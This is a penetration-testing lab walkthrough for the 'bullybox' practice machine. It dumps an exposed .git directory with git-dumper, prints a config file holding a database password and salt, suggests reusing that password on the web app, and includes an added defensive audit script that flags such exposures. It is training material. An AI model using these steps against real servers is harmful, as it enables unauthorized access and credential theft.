Git


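A hidden .git directory was discovered on the target web server. The directory listing is denied (403), but individual files such as .git/HEAD are served (200), so the repository can still be dumped.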

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox]
└─$ git-dumper http://bullybox.local/.git ./git
[-] Testing http://bullybox.local/.git/HEAD [200]
[-] Testing http://bullybox.local/.git/ [403]
 
[...REDACTED...]
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox]
└─$ cd git ; ll                                                           
total 676K
4.0K drwxrwxr-x 10 kali kali 4.0K Mar 31 18:41 .
4.0K drwxrwxr-x  7 kali kali 4.0K Mar 31 18:41 .git
500K -rw-rw-r--  1 kali kali 497K Mar 31 18:41 rb.php
4.0K -rw-rw-r--  1 kali kali  716 Mar 31 18:41 robots.txt
4.0K -rw-rw-r--  1 kali kali  825 Mar 31 18:41 index.php
4.0K drwxrwxr-x 19 kali kali 4.0K Mar 31 18:41 bb-vendor
4.0K drwxrwxr-x  6 kali kali 4.0K Mar 31 18:41 bb-themes
 32K -rw-rw-r--  1 kali kali  30K Mar 31 18:41 bb-update.php
4.0K drwxrwxr-x  3 kali kali 4.0K Mar 31 18:41 bb-uploads
4.0K drwxrwxr-x 50 kali kali 4.0K Mar 31 18:41 bb-modules
4.0K drwxrwxr-x 10 kali kali 4.0K Mar 31 18:41 bb-library
 12K -rw-rw-r--  1 kali kali  11K Mar 31 18:41 bb-load.php
4.0K drwxrwxr-x  3 kali kali 4.0K Mar 31 18:41 bb-locale
4.0K -rw-rw-r--  1 kali kali 2.3K Mar 31 18:41 .htaccess
 28K -rw-rw-r--  1 kali kali  25K Mar 31 18:41 CHANGELOG.md
 12K -rw-rw-r--  1 kali kali  12K Mar 31 18:41 LICENSE
 12K -rw-rw-r--  1 kali kali 9.9K Mar 31 18:41 README.md
4.0K -rw-rw-r--  1 kali kali 2.9K Mar 31 18:41 bb-config-sample.php
4.0K -rwxrwxr-x  1 kali kali  938 Mar 31 18:41 bb-config.php
4.0K -rw-rw-r--  1 kali kali 1.1K Mar 31 18:41 bb-cron.php
4.0K drwxrwxr-x  2 kali kali 4.0K Mar 31 18:41 bb-data
 12K -rw-rw-r--  1 kali kali  12K Mar 31 18:41 bb-di.php
4.0K -rw-rw-r--  1 kali kali 1.8K Mar 31 18:41 bb-ipn.php
4.0K drwxrwxr-x  3 kali kali 4.0K Mar 31 18:40 ..

Dumping the git repository

bb-config.php


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox/git]
└─$ cat bb-config.php
<?php
return array (
  'debug' => false,
  'salt' => 'b94ff361990c5a8a37486ffe13fabc96',
  'url' => 'http://bullybox.local/',
  'admin_area_prefix' => '/bb-admin',
  'sef_urls' => true,
  'timezone' => 'UTC',
  'locale' => 'en_US',
  'locale_date_format' => '%A, %d %B %G',
  'locale_time_format' => ' %T',
  'path_data' => '/var/www/bullybox/bb-data',
  'path_logs' => '/var/www/bullybox/bb-data/log/application.log',
  'log_to_db' => true,
  'db' =>
  array (
    'type' => 'mysql',
    'host' => 'localhost',
    'name' => 'boxbilling',
    'user' => 'admin',
    'password' => 'Playing-Unstylish7-Provided',
  ),
  'twig' =>
  array (
    'debug' => true,
    'auto_reload' => true,
    'cache' => '/var/www/bullybox/bb-data/cache',
  ),
  'api' =>
  array (
    'require_referrer_header' => false,
    'allowed_ips' =>
    array (
    ),
    'rate_span' => 3600,
    'rate_limit' => 1000,
  ),
);            

The bb-config.php file contains a DB credential: admin:Playing-Unstylish7-Provided. This is a DB credential, but it might be reused for the web application.
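A deploy-time check for the two findings above (repository metadata inside the web root and literal secrets in a PHP config), as an added example that is not part of the original notes. The function names, the list of key names and the sample values are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# PHP array entries like  'password' => 'value'  with a non-empty literal value.
SECRET_RE = re.compile(
    r"""['"](password|salt|secret|api_key)['"]\s*=>\s*['"][^'"]+['"]""", re.I)

def audit_webroot(root):
    """Return (git_dirs, hits) for a directory that is about to be served.

    git_dirs: repository metadata directories, relative to root.
    hits:     (file, line_no, key) for hard-coded secrets; values are not echoed.
    """
    root = Path(root)
    # The repository can be rebuilt whenever .git/HEAD is readable, even if
    # the server returns 403 for the .git/ directory listing itself.
    git_dirs = sorted(p.parent.relative_to(root).as_posix()
                      for p in root.rglob("HEAD") if p.parent.name == ".git")
    hits = []
    for php in sorted(root.rglob("*.php")):
        rel = php.relative_to(root)
        if ".git" in rel.parts:
            continue  # objects inside the repository are not scanned here
        lines = php.read_text(errors="replace").splitlines()
        for no, line in enumerate(lines, 1):
            m = SECRET_RE.search(line)
            if m:
                hits.append((rel.as_posix(), no, m.group(1).lower()))
    return git_dirs, hits

def build_sample(root):
    """Constructed sample web root; file names mirror the listing, values are fake."""
    root = Path(root)
    (root / ".git").mkdir()
    (root / ".git" / "HEAD").write_text("ref: refs/heads/master\n")
    (root / "bb-config.php").write_text(
        "<?php\nreturn array (\n  'salt' => 'CONSTRUCTED-SALT',\n"
        "  'db' =>\n  array (\n    'user' => 'admin',\n"
        "    'password' => 'CONSTRUCTED-PASSWORD',\n  ),\n);\n")
    (root / "bb-config-sample.php").write_text(
        "<?php\nreturn array (\n  'password' => '',\n);\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        git_dirs, hits = audit_webroot(tmp)
        print("VCS metadata in web root:", git_dirs)
        for f, no, key in hits:
            print(f"{f}:{no}: hard-coded '{key}'")
```

Run against the real document root before publishing; any entry in `git_dirs` means the deployment should exclude the repository metadata, and any hit means the secret should move out of the served tree and be rotated.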

Commits


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox/git]
└─$ git log                                                               
commit ccf7c701c4bd22484cbe5d9f8f92511261aadef0 (HEAD -> master)
Author: Yuki <admin@bullybox.local>
Date:   Tue Jun 27 04:35:12 2023 +0000
 
    Ready For launch

The repository has only a single commit.